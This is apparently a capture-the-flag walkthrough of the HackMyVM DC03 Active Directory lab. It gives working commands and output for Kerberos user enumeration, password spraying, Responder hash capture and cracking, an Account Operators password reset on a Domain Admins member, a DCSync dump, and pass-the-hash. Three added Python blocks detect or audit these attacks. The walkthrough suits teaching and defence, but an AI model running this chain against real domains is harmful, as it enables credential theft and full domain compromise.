Machine link: https://hackmyvm.eu/machines/machine.php?vm=DC03
Author: [josemlwdf](https://hackmyvm.eu/profile/?user=josemlwdf)
Difficulty: ⭐️⭐️⭐️⭐️
Topics: NTLM relay, DCSync, Account Operators group abuse
Port scanning
nmap -sC -sV 192.168.56.126 -p- -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 02:01 CST
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 82.35% done; ETC: 02:03 (0:00:07 remaining)
Stats: 0:02:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 82.35% done; ETC: 02:03 (0:00:08 remaining)
Nmap scan report for SOUPEDECODE.LOCAL (192.168.56.126)
Host is up (0.00020s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 17:17:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:9E:B3:30 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-20T17:18:28
|_ start_date: N/A
|_clock-skew: -45m31s
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9e:b3:30 (Oracle VirtualBox virtual NIC)
fscan -h 192.168.56.126
fscan version: 1.8.4
start infoscan
192.168.56.126:88 open
192.168.56.126:445 open
192.168.56.126:139 open
192.168.56.126:135 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.56.126 [+] DC:SOUPEDECODE\DC01
[*] NetInfo
[*]192.168.56.126
[->]DC01
[->]192.168.56.126
Domain name: SOUPEDECODE
Configure /etc/hosts:
192.168.56.126 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL
First, check whether SMB allows anonymous or guest access.
smbmap -u anonymous -H SOUPEDECODE.LOCAL
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
It does not.
Next, try to enumerate the domain's existing users through Kerberos pre-authentication with a wordlist.
kerbrute userenum -d SOUPEDECODE.LOCAL -t 100 --dc DC01.SOUPEDECODE.LOCAL /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -o valid_user.txt
cat valid_user.txt|grep @ |cut -d ' ' -f8 |cut -d '@' -f1 > kerber_brute_users.txt
# spray each discovered username as its own password (--no-bruteforce pairs line N of -u with line N of -p)
crackmapexec smb SOUPEDECODE.LOCAL -u kerber_brute_users.txt -p kerber_brute_users.txt --no-bruteforce --continue-on-success
No passwords were found this way.
Because our eth0 interface sits on the same subnet as the domain controller, we can use Responder to perform LLMNR (Link-Local Multicast Name Resolution) or NBT-NS (NetBIOS Name Service) poisoning.
In this way we can capture the NetNTLMv2 hashes that target devices send.
After a short while we capture the NetNTLMv2 hash of user xkate578.
responder -I eth0
[*] [LLMNR] Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer
[*] [MDNS] Poisoned answer sent to 192.168.56.126 for name FileServer.local
[*] [MDNS] Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer.local
[*] [LLMNR] Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer
[*] [MDNS] Poisoned answer sent to 192.168.56.126 for name FileServer.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.126 for name FileServer
[*] [MDNS] Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.126 for name FileServer
[SMB] NTLMv2-SSP Client : fe80::1086:8b10:30e1:e48c
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash : xkate578::soupedecode:d84ca885a743f75e...(hash truncated)
Crack this hash with hashcat (mode 5600 is NetNTLMv2):
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt
The recovered password is jesuschrist.
We now have a username and password:
xkate578:jesuschrist
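Before moving on, here is an added example (not part of the original write-up) showing how a defender would triage Responder-style output like the capture above: it counts which names were poisoned and by which protocol (a name such as "FileServer" that keeps falling back to LLMNR/mDNS usually means a typo or a stale mapping that should be fixed), and it decodes the NetNTLMv2 hash string into its fields. The blob carried in the hash contains the client's timestamp and the target name it was authenticating to, which is exactly what an incident timeline needs. The Responder lines and the hash below are constructed (the write-up's real hash is truncated); the field layout follows the NTLMv2 client-challenge structure, and the sample blob is built by `build_blob`, a helper that exists only for this example.

```python
"""Triage Responder output and decode a NetNTLMv2 (hashcat -m 5600) capture.

Added example, not part of the original write-up. The Responder lines and the
hash below are CONSTRUCTED to match the write-up's format (its real hash is
truncated); the blob layout follows the NTLMv2 client-challenge structure.
"""
import calendar
import re
import struct
from collections import Counter
from datetime import datetime, timezone

EPOCH_DIFF = 11644473600  # seconds between 1601-01-01 (FILETIME epoch) and 1970-01-01
AV_NAMES = {1: "NetBIOS computer", 2: "NetBIOS domain", 3: "DNS computer",
            4: "DNS domain", 5: "DNS tree", 6: "flags", 7: "timestamp",
            9: "target name", 10: "channel bindings"}
STRING_AV = {1, 2, 3, 4, 5, 9}  # AV pairs whose value is a UTF-16LE string


def build_blob(when, client_challenge, netbios_domain, target_spn):
    """Build the client blob ('temp') of an NTLMv2 response for the constructed sample."""
    filetime = (calendar.timegm(when.utctimetuple()) + EPOCH_DIFF) * 10**7
    av_pairs = b""
    for av_id, value in ((2, netbios_domain), (9, target_spn)):
        enc = value.encode("utf-16-le")
        av_pairs += struct.pack("<HH", av_id, len(enc)) + enc
    av_pairs += struct.pack("<HH", 0, 0)  # MsvAvEOL terminator
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def parse_netntlmv2(hash_line):
    """Split user::domain:serverchallenge:ntproofstr:blob and decode the blob."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = hash_line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    filetime, = struct.unpack_from("<Q", blob, 8)  # bytes 8..15: client FILETIME
    stamp = datetime.fromtimestamp(filetime // 10**7 - EPOCH_DIFF, tz=timezone.utc)
    av, pos = {}, 28  # AV pairs start right after the 28-byte header
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            break
        raw = blob[pos:pos + av_len]
        pos += av_len
        av[AV_NAMES.get(av_id, f"av{av_id}")] = (raw.decode("utf-16-le")
                                                if av_id in STRING_AV else raw.hex())
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "ntproofstr": ntproofstr, "timestamp": stamp.isoformat(),
            "client_challenge": blob[16:24].hex(), "av": av}


POISON_RE = re.compile(r"\[\*\] \[(\w+)\] Poisoned answer sent to (\S+) for name (\S+)")


def summarize_responder(log_text):
    """Count poisoned-name events per (protocol, name) and decode every capture line."""
    poisoned, captures = Counter(), []
    for line in log_text.splitlines():
        m = POISON_RE.match(line)
        if m:
            poisoned[(m.group(1), m.group(3))] += 1
        elif "NTLMv2-SSP Hash" in line:
            captures.append(parse_netntlmv2(line.split(" : ", 1)[1]))
    return poisoned, captures


# Constructed sample: a capture shaped like the write-up's, with a blob we control.
SAMPLE_TIME = datetime(2024, 11, 20, 17, 18, 0, tzinfo=timezone.utc)
SAMPLE_BLOB = build_blob(SAMPLE_TIME, bytes.fromhex("0123456789abcdef"),
                         "SOUPEDECODE", "cifs/FileServer")
SAMPLE_HASH = "xkate578::soupedecode:" + "11" * 8 + ":" + "22" * 16 + ":" + SAMPLE_BLOB.hex()
RESPONDER_LOG = "\n".join([
    "[*] [LLMNR] Poisoned answer sent to 192.168.56.126 for name FileServer",
    "[*] [MDNS] Poisoned answer sent to 192.168.56.126 for name FileServer.local",
    "[*] [LLMNR] Poisoned answer sent to 192.168.56.126 for name FileServer",
    "[SMB] NTLMv2-SSP Client : 192.168.56.126",
    "[SMB] NTLMv2-SSP Username : soupedecode\\xkate578",
    "[SMB] NTLMv2-SSP Hash : " + SAMPLE_HASH,
])

if __name__ == "__main__":
    names, caps = summarize_responder(RESPONDER_LOG)
    for (proto, name), n in names.most_common():
        print(f"{proto:5} {name:20} poisoned {n}x")  # a name that never resolves is the root cause to fix
    for cap in caps:
        print(f"{cap['domain']}\\{cap['user']} at {cap['timestamp']} target={cap['av'].get('target name')}")
```

The decoded timestamp is the client's clock, so compare it with the DC's clock (nmap reported a -45m31s skew on this host) before lining it up with other logs. The fix on the network side is to disable LLMNR and NetBIOS name resolution via group policy and to require SMB signing, which this DC already enforces for SMB but which does not stop the capture itself.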
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'xkate578' -p 'jesuschrist' --shares
SMB SOUPEDECODE.LOCAL 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB SOUPEDECODE.LOCAL 445 DC01 [+] SOUPEDECODE.LOCAL\xkate578:jesuschrist
SMB SOUPEDECODE.LOCAL 445 DC01 [+] Enumerated shares
SMB SOUPEDECODE.LOCAL 445 DC01 Share Permissions Remark
SMB SOUPEDECODE.LOCAL 445 DC01 ----- ----------- ------
SMB SOUPEDECODE.LOCAL 445 DC01 ADMIN$ Remote Admin
SMB SOUPEDECODE.LOCAL 445 DC01 C$ Default share
SMB SOUPEDECODE.LOCAL 445 DC01 IPC$ READ Remote IPC
SMB SOUPEDECODE.LOCAL 445 DC01 NETLOGON READ Logon server share
SMB SOUPEDECODE.LOCAL 445 DC01 share READ,WRITE
SMB SOUPEDECODE.LOCAL 445 DC01 SYSVOL READ Logon server share
smbclient -U 'xkate578' '//SOUPEDECODE.LOCAL/share'
Password for [WORKGROUP\xkate578]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Nov 21 03:29:56 2024
.. D 0 Thu Aug 1 13:38:08 2024
desktop.ini AHS 282 Thu Aug 1 13:38:08 2024
user.txt A 70 Thu Aug 1 13:39:25 2024
We get the user flag.
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# cat user.txt
12f54a96f64443246930da001cafda8b
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# dnschef --fakeip 192.168.56.126 &
[1] 71209
┌──(root㉿kali)-[/home/kali/hmv/DC03]
iphelix@thesprawl.org
(03:14:06) [*] DNSChef started on interface: 127.0.0.1
(03:14:06) [*] Using the following nameservers: 8.8.8.8
(03:14:06) [*] Cooking all A replies to point to 192.168.56.126
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# bloodhound-python -u xkate578 -p jesuschrist -ns 127.0.0.1 -d SOUPEDECODE.LOCAL -dc DC01.SOUPEDECODE.LOCAL --zip
INFO: Compressing output into 20241121031526_bloodhound.zip
Import the JSON files from the zip into BloodHound for analysis.
We find that user xkate578 is a member of the Account Operators group, which gives this user limited rights to create and modify accounts in the AD environment.
The Account Operators group grants its members limited account-creation rights.
Members of this group can create and modify most types of accounts, including user accounts and local and global groups.
In addition, members can log on directly to domain controllers. Members of the Account Operators group cannot manage the following:
- The Administrator user account.
- The default protected groups, such as Administrators, Server Operators, Account Operators, Backup Operators and Print Operators.
- Members of the Account Operators group also cannot modify system-level user rights (such as log on locally, run as a service, and so on).
Let's look at the shortest path to Domain Admins.
We can see that user FBETH103 is a member of the Operators group, and the Operators group is in turn a member of the Domain Admins group. Since Operators is not a default protected group,
members of the Account Operators group can modify the accounts of its members.
Next, we can change the password of user FBETH103.
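The misconfiguration above (a non-protected group nested inside Domain Admins) is easy to audit programmatically. The following is an added example, not code from the write-up or from BloodHound: it walks nested group membership in reverse, lists every user with effective Domain Admins membership, and flags those whose direct groups are all outside the AdminSDHolder-protected set, i.e. the accounts an Account Operator could reset. The membership map is constructed to mirror this lab (FBETH103 -> Operators -> Domain Admins); in practice it would be loaded from BloodHound's JSON or an LDAP `memberOf` query.

```python
"""Audit which effective Domain Admins an Account Operator could take over.

Added example, not part of the write-up or BloodHound. The directory below is
CONSTRUCTED to mirror the write-up's finding (FBETH103 -> Operators -> Domain
Admins); real data would come from BloodHound JSON or an LDAP memberOf query.
"""
from collections import deque

# Groups protected by AdminSDHolder: Account Operators cannot manage their members.
PROTECTED_GROUPS = {
    "ADMINISTRATORS", "ACCOUNT OPERATORS", "SERVER OPERATORS", "BACKUP OPERATORS",
    "PRINT OPERATORS", "DOMAIN ADMINS", "ENTERPRISE ADMINS", "SCHEMA ADMINS",
    "DOMAIN CONTROLLERS", "READ-ONLY DOMAIN CONTROLLERS", "REPLICATOR",
}

# Constructed directory: principal -> groups it is a *direct* member of.
MEMBER_OF = {
    "XKATE578": {"ACCOUNT OPERATORS", "DOMAIN USERS"},
    "FBETH103": {"OPERATORS", "DOMAIN USERS"},
    "OPERATORS": {"DOMAIN ADMINS"},
    "ADMINISTRATOR": {"DOMAIN ADMINS", "ADMINISTRATORS"},
    "JDOE": {"DOMAIN USERS"},
}


def reverse_index(member_of):
    """group -> set of its direct members (the direction BloodHound draws MemberOf edges)."""
    idx = {}
    for principal, groups in member_of.items():
        for g in groups:
            idx.setdefault(g, set()).add(principal)
    return idx


def nested_users(group, member_of):
    """Every user with effective membership in `group`, with the group chain leading there.

    Breadth-first walk over the reverse index. A principal that has members of its
    own is a group and gets expanded; anything else is treated as a user. `seen`
    guards against membership cycles.
    """
    idx = reverse_index(member_of)
    users, queue, seen = {}, deque([(group, [])]), {group}
    while queue:
        g, chain = queue.popleft()
        for p in sorted(idx.get(g, ())):
            if p in idx:
                if p not in seen:
                    seen.add(p)
                    queue.append((p, chain + [p]))
            else:
                users.setdefault(p, chain)
    return users


def account_operator_reachable(member_of=MEMBER_OF, target="DOMAIN ADMINS"):
    """Users effectively in `target` whose direct groups are all unprotected.

    Absent AdminSDHolder protection, an Account Operator can reset these users'
    passwords, so each one is a path from Account Operators to `target`.
    """
    findings = {}
    for user, chain in nested_users(target, member_of).items():
        direct = member_of.get(user, set())
        if user != "ADMINISTRATOR" and not (direct & PROTECTED_GROUPS):
            findings[user] = chain
    return findings


if __name__ == "__main__":
    for user, chain in account_operator_reachable().items():
        print(f"{user}: in DOMAIN ADMINS via {' -> '.join(chain)} (unprotected group)")
```

One caveat worth checking in a real domain: the SDProp process normally stamps nested members of Domain Admins with adminCount=1 and copies the AdminSDHolder ACL onto them within about an hour, which would strip Account Operators' rights over FBETH103. If such an account is still writable by Account Operators, that is a finding in itself (SDProp not running, or the ACL altered), in addition to the nested-group finding.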
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# impacket-changepasswd SOUPEDECODE.LOCAL/fbeth103@192.168.56.14 -altuser xkate578 -altpass jesuschrist -newpass admin123 -reset
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Setting the password of SOUPEDECODE.LOCAL\fbeth103 as SOUPEDECODE.LOCAL\xkate578
[*] Connecting to DCE/RPC as SOUPEDECODE.LOCAL\xkate578
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
The rpcclient setuserinfo2 command also works:
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# rpcclient -U 'xkate578' 192.168.56.14
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 admin12345
rpcclient $> exit
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'fbeth103' -p 'admin12345'
SMB SOUPEDECODE.LOCAL 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB SOUPEDECODE.LOCAL 445 DC01 [+] SOUPEDECODE.LOCAL\fbeth103:admin12345 (Pwn3d!)
bloodyAD can also be used to change the password:
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# bloodyAD -d SOUPEDECODE.LOCAL --host 192.168.56.14 -u xkate578 -p jesuschrist set password FBETH103 admin321
[+] Password changed successfully!
We now control the user FBETH103 from the Operators group, and the Operators group is a member of Domain Admins, so we can use this user to perform a DCSync attack against the domain controller.
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# crackmapexec smb DC01.SOUPEDECODE.LOCAL -u fbeth103 -p admin321 --ntds >ntds.txt
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# cat ntds.txt|grep Administrator
SMB SOUPEDECODE.LOCAL 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:2176416a80e4f62804f101d3a55d6c93:::
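Two checks a defender would want at this step, written as an added example (not from the write-up or from crackmapexec): a detector for DCSync in Security event 4662, which fires when a principal that is not a domain controller exercises a directory-replication extended right, and an audit of a pwdump-style dump like the one above for empty passwords, stored LM hashes and NT hashes shared by several accounts. The event records and the non-Administrator dump lines are constructed; the Administrator line is copied from the dump above, and the three replication-right GUIDs are the real extended-right GUIDs that appear in the event's Properties field.

```python
"""Defender checks around DCSync: flag replication requests from non-DC accounts in
Security event 4662, and audit a pwdump-style NTDS dump for weak hygiene.

Added example, not part of the write-up. The events and all dump lines except
Administrator's are CONSTRUCTED; the extended-right GUIDs are the real ones.
"""
import re
from collections import defaultdict

# Extended rights a DCSync caller needs; they appear in 4662's Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is disabled


def dcsync_alerts(events, dc_accounts):
    """Return (caller, rights) for 4662 events where a non-DC principal used a replication right."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        caller = ev.get("SubjectUserName", "")
        if rights and caller.upper() not in dc_accounts:
            alerts.append((caller, rights))
    return alerts


PWDUMP_RE = re.compile(r"(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::")


def audit_ntds_dump(lines):
    """Flag empty passwords, stored LM hashes and NT hashes shared by several accounts."""
    findings, by_nt = [], defaultdict(list)
    for line in lines:
        m = PWDUMP_RE.search(line)  # search() tolerates the 'SMB ... DC01 ' prefix crackmapexec adds
        if not m:
            continue
        user, lm, nt = m["user"], m["lm"], m["nt"]
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored"))
        by_nt[nt].append(user)
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(sorted(users)), "shared NT hash"))
    return findings


# Constructed 4662 records (fields as exported from the Security log).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$",  # normal replication between DCs
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fbeth103",  # a user account pulling secrets
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "xkate578",  # unrelated object access, placeholder GUID
     "Properties": "%%7688 {00000000-0000-0000-0000-000000000000}"},
]
DC_ACCOUNTS = {"DC01$"}  # computer accounts that legitimately replicate

# Dump lines in the format crackmapexec --ntds prints; only Administrator's is from the write-up.
SAMPLE_DUMP = [
    "SMB SOUPEDECODE.LOCAL 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:2176416a80e4f62804f101d3a55d6c93:::",
    "SMB SOUPEDECODE.LOCAL 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "SMB SOUPEDECODE.LOCAL 445 DC01 svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
    "SMB SOUPEDECODE.LOCAL 445 DC01 jdoe:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
    "SMB SOUPEDECODE.LOCAL 445 DC01 legacy:1107:aabbccddeeff00112233445566778899:fedcba9876543210fedcba9876543210:::",
]

if __name__ == "__main__":
    for caller, rights in dcsync_alerts(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"DCSync suspect: {caller} used {', '.join(rights)}")
    for subject, issue in audit_ntds_dump(SAMPLE_DUMP):
        print(f"{subject}: {issue}")
```

Keep `DC_ACCOUNTS` as an explicit allowlist rather than "anything ending in $": directory-sync service accounts (Entra ID Connect, for instance) also hold these rights legitimately and should be listed by name, and any other caller using Get-Changes-All is worth an immediate look.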
Log in with the Administrator user's NTLM hash (pass-the-hash over WinRM):
┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# evil-winrm -i 192.168.56.14 -u Administrator -H 2176416a80e4f62804f101d3a55d6c93
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
b8e59a7d4020792c412da75e589ff4fc